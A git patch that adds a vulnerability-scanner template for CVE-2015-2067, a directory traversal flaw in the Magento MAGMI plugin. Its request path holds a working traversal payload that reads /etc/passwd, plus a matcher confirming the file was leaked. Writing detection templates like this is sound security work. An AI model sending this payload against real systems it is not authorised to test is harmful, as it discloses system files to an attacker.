From 7cd433faf978a2c2e1c0a01541abc89ee3b7a8fd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 11 Oct 2021 18:24:36 +0700 Subject: [PATCH] Create CVE-2015-2067.yaml --- cves/2015/CVE-2015-2067.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2015/CVE-2015-2067.yaml diff --git a/cves/2015/CVE-2015-2067.yaml b/cves/2015/CVE-2015-2067.yaml new file mode 100644 index 0000000000..5e4ba266b4 --- /dev/null +++ b/cves/2015/CVE-2015-2067.yaml @@ -0,0 +1,27 @@ +id: CVE-2015-2067 + +info: + name: Magento Server Magmi Plugin - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35996 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 + tags: cve,cve2015,lfi,magento + +requests: + - method: GET + path: + - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200